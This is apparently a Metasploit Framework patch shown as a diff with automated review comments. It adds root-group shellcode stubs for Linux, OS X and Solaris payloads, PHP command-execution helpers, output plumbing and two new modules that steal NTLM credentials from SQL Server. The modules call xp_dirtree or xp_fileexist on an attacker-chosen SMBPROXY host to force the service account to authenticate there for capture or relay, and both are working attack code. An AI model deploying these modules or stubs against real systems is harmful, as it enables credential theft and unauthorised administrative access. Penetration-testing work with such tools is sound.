||||
[
|
||||
false,
|
||||
"Prepend a stub that executes the setregid(0, 0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetgid',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes the setgid(0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependChrootBreak',
|
||||
[
|
||||
false,
|
||||
|
@ -102,6 +123,31 @@ module Msf::Payload::Linux
|
|||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetresgid'])
|
||||
# setresgid(0, 0, 0)
|
||||
pre << "\x31\xc9" +# xorl %ecx,%ecx #
|
||||
"\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\xf7\xe3" +# mull %ebx #
|
||||
"\xb0\xaa" +# movb $0xaa,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetregid'])
|
||||
# setregid(0, 0)
|
||||
pre << "\x31\xc9" +# xorl %ecx,%ecx #
|
||||
"\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\x6a\x47" +# pushl $0x47 #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetgid'])
|
||||
# setgid(0)
|
||||
pre << "\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\x6a\x2e" +# pushl $0x2e #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
if (datastore['PrependChrootBreak'])
|
||||
# setreuid(0, 0)
|
||||
pre << "\x31\xc9" +# xorl %ecx,%ecx #
|
||||
|
@ -185,6 +231,33 @@ module Msf::Payload::Linux
|
|||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetresgid'])
|
||||
# setresgid(0, 0, 0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
|
||||
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\xab" +# addi r0,r31,-341 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetregid'])
|
||||
# setregid(0, 0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x48" +# addi r0,r31,-440 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetgid'])
|
||||
# setgid(0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x2f" +# addi r0,r31,-465 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
|
||||
if (datastore['PrependChrootBreak'])
|
||||
# setreuid(0, 0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
|
@ -235,6 +308,33 @@ module Msf::Payload::Linux
|
|||
pre << "\x0f\x05" # syscall #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetresgid'])
|
||||
# setresgid(0, 0, 0)
|
||||
pre << "\x48\x31\xff" # xor rdi,rdi #
|
||||
pre << "\x48\x89\xfe" # mov rsi,rdi #
|
||||
pre << "\x6a\x77" # push 0x77 #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetregid'])
|
||||
# setregid(0, 0)
|
||||
pre << "\x48\x31\xff" # xor rdi,rdi #
|
||||
pre << "\x48\x89\xfe" # mov rsi,rdi #
|
||||
pre << "\x48\x89\xf2" # mov rdx,rsi #
|
||||
pre << "\x6a\x72" # push 0x72 #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetgid'])
|
||||
# setgid(0)
|
||||
pre << "\x48\x31\xff" # xor rdi,rdi #
|
||||
pre << "\x6a\x6a" # push 0x6a #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
end
|
||||
|
||||
if (datastore['PrependChrootBreak'])
|
||||
|
||||
# setreuid(0, 0)
|
||||
|
@ -269,7 +369,7 @@ module Msf::Payload::Linux
|
|||
pre << "\x48\x89\xe7" # mov rdi,rsp #
|
||||
|
||||
# loop chdir(..) 69 times
|
||||
# syscall tendo to modify rcx can't use loop...
|
||||
# syscall tend to modify rcx can't use loop...
|
||||
pre << "\x6a\x45" # push 0x45 #
|
||||
pre << "\x5b" # pop rbx #
|
||||
pre << "\x6a\x50" # push 0x50 #
|
||||
|
@ -278,7 +378,7 @@ module Msf::Payload::Linux
|
|||
pre << "\xfe\xcb" # dec bl #
|
||||
pre << "\x75\xf7" # jnz -7 #
|
||||
|
||||
# chrot (.) (witch should by /)
|
||||
# chroot (.) (which should be /)
|
||||
pre << "\x6a\x2e" # push . (0x2e) #
|
||||
pre << "\x48\x89\xe7" # mov rdi,rsp #
|
||||
pre << "\x48\x89\xd0" # mov rax,rdx #
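Review bot: In the x64 `PrependSetresgid` stub (the `@ -235,6 +308,33` hunk) the third syscall argument is never set: `xor rdi,rdi` and `mov rsi,rdi` zero rdi and rsi, but rdx still holds whatever the preceding code left, so the kernel sees setresgid(0, 0, <rdx>) rather than setresgid(0, 0, 0). The `PrependSetregid` stub directly below has the mirror-image problem — it zeroes rdx with `mov rdx,rsi` although setregid takes only two arguments — which looks like the line landed in the wrong stub. Move `pre << "\x48\x89\xf2" # mov rdx,rsi #` into the setresgid stub after the `mov rsi,rdi` line and drop it from setregid. The x86 (`mul ebx` zeroes edx) and PPC (r3, r4, r5 all xor'd) stubs in the earlier hunks of this file do initialise all three arguments, so only the x64 variant is affected.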
|
||||
|
|
|
@ -40,6 +40,27 @@ module Msf::Payload::Osx
|
|||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetresgid',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes the setresgid(0, 0, 0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetregid',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes the setregid(0, 0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetgid',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes the setgid(0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('AppendExit',
|
||||
[
|
||||
false,
|
||||
|
@ -99,6 +120,35 @@ module Msf::Payload::Osx
|
|||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetresgid'])
|
||||
# setresgid(0, 0, 0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x66\xb8\x38\x01" +# movw $0x0138,%ax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetregid'])
|
||||
# setregid(0, 0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\x7f" +# movb $0x7f,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetgid'])
|
||||
# setgid(0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\xb5" +# movb $0xb5,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
# Append
|
||||
|
||||
if (datastore['AppendExit'])
|
||||
|
|
|
@ -6,10 +6,17 @@ require 'msf/core'
|
|||
###
|
||||
module Msf::Payload::Php
|
||||
|
||||
def initialize(info = {})
|
||||
super(info)
|
||||
end
|
||||
|
||||
#
|
||||
# Generate a chunk of PHP code that should be eval'd before
|
||||
# #php_system_block.
|
||||
#
|
||||
# The generated code will initialize
|
||||
#
|
||||
# @options options [String] :disabled_varname PHP variable name in which to
|
||||
# store an array of disabled functions.
|
||||
#
|
||||
# @returns [String] A chunk of PHP code
|
||||
#
|
||||
def php_preamble(options = {})
|
||||
dis = options[:disabled_varname] || '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
|
||||
dis = '$' + dis if (dis[0,1] != '$')
|
||||
|
@ -32,6 +39,20 @@ module Msf::Payload::Php
|
|||
return preamble
|
||||
end
|
||||
|
||||
#
|
||||
# Generate a chunk of PHP code that tries to run a command.
|
||||
#
|
||||
# @options options [String] :cmd_varname PHP variable name containing the
|
||||
# command to run
|
||||
# @options options [String] :disabled_varname PHP variable name containing
|
||||
# an array of disabled functions. See #php_preamble
|
||||
# @options options [String] :output_varname PHP variable name in which to
|
||||
# store the output of the command. Will contain 0 if no exec functions
|
||||
# work.
|
||||
#
|
||||
# @returns [String] A chunk of PHP code that, with a little luck, will run a
|
||||
# command.
|
||||
#
|
||||
def php_system_block(options = {})
|
||||
cmd = options[:cmd_varname] || '$cmd'
|
||||
dis = options[:disabled_varname] || @dis || '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
|
||||
|
@ -102,12 +123,12 @@ module Msf::Payload::Php
|
|||
# Currently unused until we can figure out how to get output with COM
|
||||
# objects (which are not subject to safe mode restrictions) instead of
|
||||
# PHP functions.
|
||||
win32_com = "
|
||||
if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {
|
||||
$wscript = new COM('Wscript.Shell');
|
||||
$wscript->run(#{cmd} . ' > %TEMP%\\out.txt');
|
||||
#{output} = file_get_contents('%TEMP%\\out.txt');
|
||||
}else"
|
||||
#win32_com = "
|
||||
# if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {
|
||||
# $wscript = new COM('Wscript.Shell');
|
||||
# $wscript->run(#{cmd} . ' > %TEMP%\\out.txt');
|
||||
# #{output} = file_get_contents('%TEMP%\\out.txt');
|
||||
# }else"
|
||||
fail_block = "
|
||||
{
|
||||
#{output}=0;
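Review bot: The new YARD comments on `php_preamble` and `php_system_block` use `@options` and `@returns`, which are not YARD tags (`yard` will report them as unknown and the parameters stay undocumented); the valid forms are `# @option options [String] :disabled_varname PHP variable name in which to store an array of disabled functions.` and `# @return [String] A chunk of PHP code`. The sentence `# The generated code will initialize` in the `php_preamble` header is cut off mid-thought and should say what is initialised (presumably the disabled-functions array named by `:disabled_varname`). `php_system_block` now falls back to `@dis`, but nothing in these hunks assigns it — worth confirming `php_preamble` (whose body continues outside the hunk) sets it, otherwise the two methods can pick different random variable names. The added `initialize(info = {})` that only calls `super(info)` is a no-op and can be dropped.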
|
||||
|
|
|
@ -33,6 +33,20 @@ module Msf::Payload::Solaris
|
|||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetregid',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes the setregid(0, 0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetgid',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes the setgid(0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('AppendExit',
|
||||
[
|
||||
false,
|
||||
|
@ -86,6 +100,22 @@ module Msf::Payload::Solaris
|
|||
"\xff\xd6" # call *%esi #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetregid'])
|
||||
# setregid(0, 0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\xcb" +# movb $0xcb,%al #
|
||||
"\xff\xd6" # call *%esi #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetgid'])
|
||||
# setgid(0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\x2e" +# movb $0x2e,%al #
|
||||
"\xff\xd6" # call *%esi #
|
||||
end
|
||||
# Append
|
||||
|
||||
if (datastore['AppendExit'])
|
||||
|
|
|
@ -140,6 +140,14 @@ class Plugin
|
|||
output.print_line(msg) if (output)
|
||||
end
|
||||
|
||||
#
|
||||
# Prints a warning
|
||||
#
|
||||
def print_warning(msg='')
|
||||
output.print_warning(msg) if (output)
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Prints a message with no decoration.
|
||||
#
|
||||
|
|
|
@ -98,6 +98,10 @@ class BidirectionalPipe < Rex::Ui::Text::Input
|
|||
print_line('[*] ' + msg)
|
||||
end
|
||||
|
||||
def print_warning(msg='')
|
||||
print_warning('[!] ' + msg)
|
||||
end
|
||||
|
||||
#
|
||||
# Wrappers for the pipe_input methods
|
||||
#
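Review bot: `print_warning` in this hunk calls itself — `print_warning('[!] ' + msg)` — so the first warning routed through `BidirectionalPipe` recurses until a SystemStackError. The sibling method just above delegates to `print_line('[*] ' + msg)`, and this one should do the same: `print_line('[!] ' + msg)`.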
|
||||
|
|
|
@ -367,6 +367,17 @@ module PacketDispatcher
|
|||
end
|
||||
end
|
||||
|
||||
# If the backlog and incomplete arrays are the same, it means
|
||||
# dispatch_inbound_packet wasn't able to handle any of the
|
||||
# packets. When that's the case, we can get into a situation
|
||||
# where @pqueue is not empty and, since nothing else bounds this
|
||||
# loop, we spin CPU trying to handle packets that can't be
|
||||
# handled. Sleep here to treat that situation as though the
|
||||
# queue is empty.
|
||||
if (backlog.length > 0 && backlog.length == incomplete.length)
|
||||
::IO.select(nil, nil, nil, 0.10)
|
||||
end
|
||||
|
||||
@pqueue.unshift(*incomplete)
|
||||
|
||||
if(@pqueue.length > 100)
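Review bot: The new comment says the sleep applies when `backlog` and `incomplete` are "the same", but the condition compares only their lengths; that is equivalent only if `incomplete` is always built from `backlog`'s elements, which the loop above (it starts outside this hunk) presumably guarantees, and the comment should state it: `# incomplete is drawn from backlog, so equal lengths means nothing was dispatched`. The `::IO.select(nil, nil, nil, 0.10)` used as a sleep also deserves a one-line why-comment if it is deliberately preferred over `sleep(0.10)`, otherwise the plain `sleep` reads clearer.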
|
||||
|
|
|
@ -43,7 +43,14 @@ class Console::CommandDispatcher::Stdapi::Sys
|
|||
"-t" => [ true, "The registry value type (E.g. REG_SZ)." ],
|
||||
"-v" => [ true, "The registry value name (E.g. Stuff)." ],
|
||||
"-r" => [ true, "The remote machine name to connect to (with current process credentials" ],
|
||||
"-w" => [ false, "Set KEY_WOW64 flag, valid values [32|64]." ])
|
||||
"-w" => [ false, "Set KEY_WOW64 flag, valid values [32|64]." ])
|
||||
|
||||
@@ps_opts = Rex::Parser::Arguments.new(
|
||||
"-h" => [ false, "Help menu." ],
|
||||
"-S" => [ true, "Filters processes on the process name using the supplied RegEx"],
|
||||
"-A" => [ true, "Filters processes on architecture (x86 or x86_64)" ],
|
||||
"-s" => [ false, "Show only SYSTEM processes" ],
|
||||
"-U" => [ true, "Filters processes on the user using the supplied RegEx" ])
|
||||
|
||||
#
|
||||
# List of supported commands.
|
||||
|
@ -274,6 +281,54 @@ class Console::CommandDispatcher::Stdapi::Sys
|
|||
#
|
||||
def cmd_ps(*args)
|
||||
processes = client.sys.process.get_processes
|
||||
@@ps_opts.parse(args) do |opt, idx, val|
|
||||
case opt
|
||||
when "-h"
|
||||
cmd_ps_help
|
||||
return true
|
||||
when "-S"
|
||||
print_line "Filtering on process name..."
|
||||
searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new
|
||||
processes.each do |proc|
|
||||
if val.nil? or val.empty?
|
||||
print_line "You must supply a search term!"
|
||||
return false
|
||||
end
|
||||
searched_procs << proc if proc["name"].match(/#{val}/)
|
||||
end
|
||||
processes = searched_procs
|
||||
when "-A"
|
||||
print_line "Filtering on arch..."
|
||||
searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new
|
||||
processes.each do |proc|
|
||||
next if proc['arch'].nil? or proc['arch'].empty?
|
||||
if val.nil? or val.empty? or !(val == "x86" or val == "x86_64")
|
||||
print_line "You must select either x86 or x86_64"
|
||||
return false
|
||||
end
|
||||
searched_procs << proc if proc["arch"] == val
|
||||
end
|
||||
processes = searched_procs
|
||||
when "-s"
|
||||
print_line "Filtering on SYSTEM processes..."
|
||||
searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new
|
||||
processes.each do |proc|
|
||||
searched_procs << proc if proc["user"] == "NT AUTHORITY\\SYSTEM"
|
||||
end
|
||||
processes = searched_procs
|
||||
when "-U"
|
||||
print_line "Filtering on user name..."
|
||||
searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new
|
||||
processes.each do |proc|
|
||||
if val.nil? or val.empty?
|
||||
print_line "You must supply a search term!"
|
||||
return false
|
||||
end
|
||||
searched_procs << proc if proc["user"].match(/#{val}/)
|
||||
end
|
||||
processes = searched_procs
|
||||
end
|
||||
end
|
||||
if (processes.length == 0)
|
||||
print_line("No running processes were found.")
|
||||
else
|
||||
|
@ -284,6 +339,15 @@ class Console::CommandDispatcher::Stdapi::Sys
|
|||
return true
|
||||
end
|
||||
|
||||
def cmd_ps_help
|
||||
print_line "Use the command with no arguments to see all running processes."
|
||||
print_line "The following options can be used to filter those results:"
|
||||
|
||||
print_line @@ps_opts.usage
|
||||
end
|
||||
|
||||
|
||||
|
||||
#
|
||||
# Reboots the remote computer.
|
||||
#
|
||||
|
@ -595,6 +659,7 @@ class Console::CommandDispatcher::Stdapi::Sys
|
|||
client.sys.power.shutdown
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
end
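Review bot: In `cmd_ps` (the `@ -274,6 +281,54` hunk) the `-S` and `-U` branches validate `val` inside `processes.each`, so a missing pattern is only reported when the process list is non-empty and the check is re-run for every process; hoist `if val.nil? or val.empty?` (and the `-A` value check) above the loops. `proc["user"].match(/#{val}/)` raises NoMethodError if a process has no user entry — the `-A` branch guards a nil `arch` but `-S`/`-U` do not — so use `proc["user"].to_s.match(...)`, and since `val` is interpolated unescaped into the Regexp, a malformed pattern surfaces as an uncaught RegexpError rather than a usage message; wrapping `Regexp.new(val)` once before the loop would catch both. Stylistically the `and`/`or` in these conditions should be `&&`/`||`.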
|
||||
|
|
|
@ -1894,11 +1894,11 @@ NTLM_UTILS = Rex::Proto::NTLM::Utils
|
|||
last_search_id = sid
|
||||
last_offset = loff
|
||||
last_filename = name
|
||||
if eos != 1 #If we aren't at the end of the search, run find_next
|
||||
if eos == 0 and last_offset != 0 #If we aren't at the end of the search, run find_next
|
||||
resp = find_next(last_search_id, last_offset, last_filename)
|
||||
search_next = 1 # Flip bit so response params will parse correctly
|
||||
end
|
||||
end until eos == 1
|
||||
end until eos != 0 or last_offset == 0
|
||||
rescue ::Exception
|
||||
raise $!
|
||||
end
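Review bot: The reworked loop guard (taking `if eos == 0 and last_offset != 0` and `end until eos != 0 or last_offset == 0` as the new side) uses `and`/`or` for boolean logic; they parse correctly here because both operands are complete comparisons, but `&&`/`||` is the conventional form and avoids the precedence trap if the condition is later extended. The reason `last_offset == 0` now ends the search is not documented — the trailing comment still only says "If we aren't at the end of the search" — so add something like `# a zero resume offset gives find_next nothing to continue from; stop instead of re-issuing the same request` (assuming that is the loop this guards against; the enclosing method starts outside the hunk).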
|
||||
|
|
|
@ -9,6 +9,7 @@ class Base
|
|||
def print_status(msg); end
|
||||
def print_good(msg); end
|
||||
def print_error(msg); end
|
||||
def print_warning(msg); end
|
||||
end
|
||||
|
||||
attr_accessor :client, :framework, :path, :error, :args
|
||||
|
|
|
@ -45,6 +45,12 @@ class Output
|
|||
def print_line(msg='')
|
||||
end
|
||||
|
||||
#
|
||||
# Prints a warning
|
||||
#
|
||||
def print_warning(msg='')
|
||||
end
|
||||
|
||||
#
|
||||
# Prints a message with no decoration.
|
||||
#
|
||||
|
|
|
@ -66,6 +66,16 @@ module Subscriber
|
|||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Wraps user_output.print_warning
|
||||
#
|
||||
def print_warning(msg='')
|
||||
if (user_output)
|
||||
print_blank_line if user_output.prompting?
|
||||
user_output.print_warning(msg)
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Wraps user_output.print
|
||||
#
|
||||
|
|
|
@ -81,6 +81,13 @@ module DispatcherShell
|
|||
shell.print_good(msg)
|
||||
end
|
||||
|
||||
#
|
||||
# Wraps shell.print_warning
|
||||
#
|
||||
def print_warning(msg = '')
|
||||
shell.print_warning(msg)
|
||||
end
|
||||
|
||||
#
|
||||
# Wraps shell.print
|
||||
#
|
||||
@ -67,6 +67,10 @@ class Output < Rex::Ui::Output
|
|||
print(msg + "\n")
|
||||
end
|
||||
|
||||
def print_warning(msg = '')
|
||||
print_line("%bld%yel[!]%clr #{msg}")
|
||||
end
|
||||
|
||||
def print(msg = '')
|
||||
print_raw(substitute_colors(msg))
|
||||
end
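Review bot: `print_warning` interpolates msg into a string that then passes through `substitute_colors` via `print` (visible two methods down), so any `%bld`/`%yel`/`%clr`-style tokens inside a message, including text echoed back from a remote host, are expanded as colour codes rather than printed literally. That is presumably the same behaviour as the existing print_status/print_error siblings, which are not in this hunk, so at minimum it deserves a comment: `# NOTE: msg is colour-substituted together with the prefix; escape '%' in untrusted text before calling`. If the siblings instead substitute only the prefix, this method should do the same and append the raw message.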
|
||||
@ -303,6 +303,16 @@ module Shell
|
|||
log_output(output.print_line(msg))
|
||||
end
|
||||
|
||||
#
|
||||
# Prints a warning message to the output handle.
|
||||
#
|
||||
def print_warning(msg='')
|
||||
return if (disable_output == true)
|
||||
|
||||
self.on_print_proc.call(msg) if self.on_print_proc
|
||||
log_output(output.print_warning(msg))
|
||||
end
|
||||
|
||||
#
|
||||
# Prints a raw message to the output handle.
|
||||
#
|
||||
@ -35,13 +35,11 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Author' => 'jduck',
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'Platform' => [ 'win' ],
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '65533'],
|
||||
[ 'URL', 'http://seclists.org/bugtraq/2010/Jun/160' ]
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DisclosureDate' => 'Jun 15 2010'
|
||||
)
|
||||
|
||||
@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'OSVDB', '73447' ],
|
||||
[ 'CVE', '2008-2938' ],
|
||||
[ 'URL', 'http://www.securityfocus.com/archive/1/499926' ],
|
||||
[ 'EDB', 17388 ],
|
||||
[ 'EDB', '17388' ],
|
||||
[ 'BID', '48225' ],
|
||||
],
|
||||
'Author' => [ 'patrick' ],
|
||||
@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
['OSVDB', '52048'],
|
||||
['CVE', '2009-0815'],
|
||||
['URL', 'http://secunia.com/advisories/33829/'],
|
||||
['EDB', 8038],
|
||||
['EDB', '8038'],
|
||||
['URL', 'http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-002/'],
|
||||
],
|
||||
'DisclosureDate' => 'Feb 10 2009',
|
||||
@ -0,0 +1,78 @@
|
|||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::MSSQL
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft SQL Server NTLM Stealer',
|
||||
'Description' => %q{
|
||||
This module can be used to help capture or relay the LM/NTLM credentials of the
|
||||
account running the remote SQL Server service. The module will use the supplied
|
||||
credentials to connect to the target SQL Server instance and execute the native
|
||||
"xp_dirtree" or "xp_fileexist" stored procedure. The stored procedures will then
|
||||
force the service account to authenticate to the system defined in the SMBProxy
|
||||
option. In order for the attack to be successful, the SMB capture or relay module
|
||||
must be running on the system defined as the SMBProxy. The database account used
|
||||
to connect to the database should only require the "PUBLIC" role to execute.
|
||||
Successful execution of this attack usually results in local administrative access
|
||||
to the Windows system. Specifically, this works great for relaying credentials
|
||||
between two SQL Servers using a shared service account to get shells. However, if
|
||||
the relay fails, then the LM hash can be reversed using the Halflm rainbow tables
|
||||
and john the ripper. Thanks to "Sh2kerr" who wrote the ora_ntlm_stealer for the
|
||||
inspiration.
|
||||
},
|
||||
'Author' => [ 'nullbind <scott.sutherland[at]netspi.com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [[ 'URL', 'http://en.wikipedia.org/wiki/SMBRelay' ]]
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('SMBPROXY', [ true, 'IP of SMB proxy or sniffer.', '0.0.0.0']),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
# Reminder
|
||||
print_status("DONT FORGET to run a SMB capture or relay module!")
|
||||
|
||||
# Call auth_force method to execute "xp_dirtree"
|
||||
begin
|
||||
force_auth("xp_dirtree",datastore['SMBPROXY'])
|
||||
return
|
||||
rescue
|
||||
print_error("xp_dirtree failed to initiate authentication to smbproxy.")
|
||||
end
|
||||
|
||||
# Call auth_force method to execute "xp_fileexist" if "xp_dirtree" fails
|
||||
begin
|
||||
force_auth("xp_fileexist",datastore['SMBPROXY'])
|
||||
return
|
||||
rescue
|
||||
print_error("xp_fileexist failed to initiate authentication to smbproxy.")
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
# Method to force sql server to authenticate
|
||||
def force_auth(sprocedure,smbproxy)
|
||||
|
||||
print_status("Forcing SQL Server at #{rhost} to auth to #{smbproxy} via #{sprocedure}...")
|
||||
|
||||
# Generate random file name
|
||||
rand_filename = Rex::Text.rand_text_alpha(8, bad='')
|
||||
|
||||
# Setup query
|
||||
sql = "#{sprocedure} '\\\\#{smbproxy}\\#{rand_filename}'"
|
||||
result = mssql_query(sql, false) if mssql_login_datastore
|
||||
column_data = result[:rows]
|
||||
print_good("Successfully executed #{sprocedure} on #{rhost}")
|
||||
print_good("Go check your SMB relay or capture module for goodies!")
|
||||
|
||||
end
|
||||
|
||||
end
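Review bot: In `force_auth`, `result` is assigned only when `mssql_login_datastore` succeeds, so a failed login leaves it nil and `result[:rows]` raises NoMethodError; the bare `rescue` in `run_host` then reports "xp_dirtree failed to initiate authentication", retries with xp_fileexist and fails the same way, and the operator is never told the credentials were rejected. Check the login explicitly before querying, `unless mssql_login_datastore` / `print_error("#{rhost} - MSSQL login failed"); return` / `end`, and drop the unused `column_data` so the query result is not dereferenced at all. The two `print_good` lines fire whenever the query does not raise, which says nothing about whether the service account actually reached SMBPROXY; "executed" is the most that can be claimed, and the SMBPROXY default of 0.0.0.0 guarantees a useless first run unless the operator sets it. `rand_text_alpha(8, bad='')` also assigns a throwaway local; `rand_text_alpha(8)` reads the same.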
@ -0,0 +1,60 @@
|
|||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::MSSQL_SQLI
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft SQL Server NTLM Stealer - SQLi',
|
||||
'Description' => %q{
|
||||
This module can be used to help capture or relay the LM/NTLM credentials of the
|
||||
account running the remote SQL Server service. The module will use the SQL
|
||||
injection from GET_PATH to connect to the target SQL Server instance and execute
|
||||
the native "xp_dirtree" or stored procedure. The stored procedures will then
|
||||
force the service account to authenticate to the system defined in the SMBProxy
|
||||
option. In order for the attack to be successful, the SMB capture or relay module
|
||||
must be running on the system defined as the SMBProxy. The database account used to
|
||||
connect to the database should only require the "PUBLIC" role to execute.
|
||||
Successful execution of this attack usually results in local administrative access
|
||||
to the Windows system. Specifically, this works great for relaying credentials
|
||||
between two SQL Servers using a shared service account to get shells. However, if
|
||||
the relay fails, then the LM hash can be reversed using the Halflm rainbow tables
|
||||
and john the ripper.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'nullbind <scott.sutherland[at]netspi.com>',
|
||||
'Antti <antti.rantasaari[at]netspi.com>'
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', { } ],
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'References' => [[ 'URL', 'http://en.wikipedia.org/wiki/SMBRelay' ]]
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('SMBPROXY', [ true, 'IP of SMB proxy or sniffer.', '0.0.0.0']),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run
|
||||
|
||||
# Reminder
|
||||
print_status("DONT FORGET to run a SMB capture or relay module!")
|
||||
|
||||
# Generate random file name
|
||||
rand_filename = Rex::Text.rand_text_alpha(8, bad='')
|
||||
|
||||
# Setup query - double escaping backslashes
|
||||
sql = "exec master..xp_dirtree '\\\\\\\\#{datastore['SMBPROXY']}\\#{rand_filename}'"
|
||||
print_status("Attempting to force backend DB to authenticate to the #{datastore['SMBPROXY']}")
|
||||
|
||||
# Execute query to force authentation from backend database to smbproxy
|
||||
mssql_query(sql)
|
||||
end
|
||||
end
